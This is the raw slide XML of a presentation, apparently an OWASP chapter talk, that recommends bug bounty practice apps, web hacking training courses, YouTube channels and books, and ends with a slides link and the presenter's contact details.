        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9334503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0972B-A635-4E3F-9AB3-01BDA886F29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendations Bug Bounty </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28BABB69-FD2B-44F7-87C1-885FCEE18BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn how to report </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep at it – try harder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider some No-Reward Bounties until you get the skills needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for some older programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.vulnerability-lab.com/list-of-bug-bounty-programs.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379999679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F785-61F4-4D94-8519-D1952831CF18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug Bounty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F60BA388-2363-4491-8A1A-160EABD21C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Open Bug Bounty</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD9DBE5-6391-4EA0-BBD5-4758048D2AB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129251" y="2271673"/>
            <a:ext cx="9933497" cy="4411204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18631720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XSS – Practice</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835742" y="1927122"/>
            <a:ext cx="10211669" cy="4630993"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Broken Web App Project – Source Forge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Vulnerable Web App – College Professor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Damn Vulnerable Web Application (DVWA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Mutillidae - webpwnized/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Vulnerable Web Application Directory Projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>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930753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Web Hacking – Training - Paid</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4" y="1661652"/>
            <a:ext cx="9905998" cy="5010098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PentesterAcademy- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.pentesteracademy.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SANS – SEC542: Web App Penetration Testing and Ethical Hacking-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.sans.org/course/web-app-penetration-testing-ethical-hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Offensive Security Web Expert -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>eLearnSecurity – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eWPT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.elearnsecurity.com/certification/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Practical Web Application Penetration Testing - PWAPT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.lanmaster53.com/training/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857094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Web hacking – Training - FREE</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53728" y="1445342"/>
            <a:ext cx="10093683" cy="5226408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>YouTube – Web Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Webpwnized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IppSec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Derek Rook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Bugcrowd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LiveOverflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>m4v3r1ck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Adrian Crenshaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PentestersAcademy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>YouTube – Coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Derek Banas- Language in an hour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Learn To Code – GOLANG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LearnWebCode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SimplyCoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hackerone.com/hacker101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.infosecurity-magazine.com/news/hackedu-hackerone-partner-to-offer/</a:t>
            </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1398339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Books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452284" y="1612490"/>
            <a:ext cx="10595128" cy="5059260"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 2nd Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Hacker Playbook 3: Practical Guide To Penetration Testing Paperback – May 2, 2018, also recommend 1&amp;2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTFM – Red Team Field Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Penetration testers guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Black Hat Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Kali Linux Revealed </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Testing guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19379278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F3DCE-495F-4F3E-B6C5-0D21B10D64BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9EA9A2C-EEB8-4C85-BC3B-2D112CEFD0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slides can be found here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/outofcontrolnate/Central-Pennsylvania--OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15788613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Contact</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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Nathan.cooper@owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Connect on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
